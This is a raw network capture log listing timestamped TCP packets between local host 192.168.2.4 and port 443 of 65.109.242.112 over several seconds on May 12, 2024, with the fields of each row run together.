                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.675529957 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.675550938 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.675602913 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.675611019 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.675649881 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.696018934 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.696034908 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.696103096 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.696109056 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.696150064 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.717437029 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.717452049 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.717500925 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.717509985 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.717549086 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.739449978 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.739465952 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.739521027 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.739527941 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.739567041 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.757534027 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.757548094 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.757599115 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.757605076 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.757643938 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.777820110 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.777839899 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.777892113 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.777899027 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.777936935 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.793126106 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.793142080 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.793294907 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.793301105 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.793345928 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.811714888 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.811728954 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.811904907 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.811911106 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.811959028 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.827033997 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.827049017 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.827107906 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.827115059 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.827153921 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.844278097 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.844293118 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.844363928 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.844371080 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.844412088 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.859530926 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.859546900 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.859617949 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.859623909 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.859668016 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.873131037 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.873146057 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.873358965 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.873366117 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.873425961 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.886198997 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.886218071 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.886269093 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.886275053 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.886312962 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.900943995 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.900957108 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.901062965 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.901073933 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.901160002 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.914166927 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.914180994 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.914231062 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.914237976 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.914274931 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.925914049 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.925928116 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.925986052 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.925992012 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.926032066 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.927843094 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.927891970 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.927897930 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.927913904 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.927953005 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.927988052 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.928102970 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.928117037 CEST4434974965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.928128958 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.928160906 CEST49749443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.963483095 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.963515043 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.963606119 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.963804007 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:19.963816881 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:20.623828888 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:20.623909950 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:20.624321938 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:20.624330044 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:20.624511957 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:20.624516964 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657761097 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657783031 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657797098 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657826900 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657857895 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657869101 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.657917023 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.807636023 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.807657003 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.807786942 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.807802916 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:21.807847977 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.033098936 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.033116102 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.033169031 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.033181906 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.033210039 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.033220053 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.179264069 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.179282904 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.179332972 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.179347992 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.179361105 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.179389000 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.295789003 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.295804024 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.295986891 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.295994997 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.296036959 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.374130011 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.374145985 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.374202967 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.374218941 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.374258041 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.431535006 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.431554079 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.431644917 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.431658983 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.431698084 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.504055023 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.504070044 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.504215002 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.504225016 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.504266024 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.569257021 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.569272041 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.569325924 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.569334984 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.569376945 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.625245094 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.625264883 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.625442028 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.625451088 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.625488997 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.676565886 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.676580906 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.676656961 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.676662922 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.676704884 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.719403028 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.719424009 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.719461918 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.719469070 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.719497919 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.719516993 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.755363941 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.755382061 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.755476952 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.755496979 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.755537987 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.786128044 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.786140919 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.786220074 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.786227942 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.786283016 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.817198992 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.817213058 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.817384958 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.817392111 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.817440033 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.844324112 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.844337940 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.844404936 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.844412088 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.844455004 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.872030020 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.872044086 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.872106075 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.872111082 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.872149944 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.900624990 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.900639057 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.900715113 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.900722027 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.900763035 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.924241066 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.924254894 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.924319029 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.924324036 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.924361944 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.949081898 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.949095964 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.949160099 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.949167013 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.949204922 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.970571041 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.970590115 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.970655918 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.970662117 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.970688105 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.970705032 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.995135069 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.995148897 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.995218992 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.995230913 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:22.995285034 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.015568972 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.015582085 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.015640974 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.015647888 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.015686035 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.036978006 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.036992073 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.037070036 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.037077904 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.037118912 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.058866024 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.058878899 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.058959007 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.058964968 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.059004068 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.077138901 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.077153921 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.077235937 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.077243090 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.077286005 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.097312927 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.097335100 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.097409010 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.097420931 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.097457886 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104281902 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104362965 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104388952 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104439020 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104588032 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104605913 CEST4434975065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104614973 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.104649067 CEST49750443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.154186010 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.154222965 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.154314041 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.154558897 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.154571056 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.813812971 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.813891888 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.814336061 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.814347029 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.814502001 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:23.814507008 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849157095 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849178076 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849193096 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849231958 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849251986 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849261999 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.849309921 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.999017954 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.999038935 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.999109030 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.999121904 CEST4434975165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:24.999162912 CEST49751443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:25.224029064 CEST4434975165.109.242.112192.168.2.4
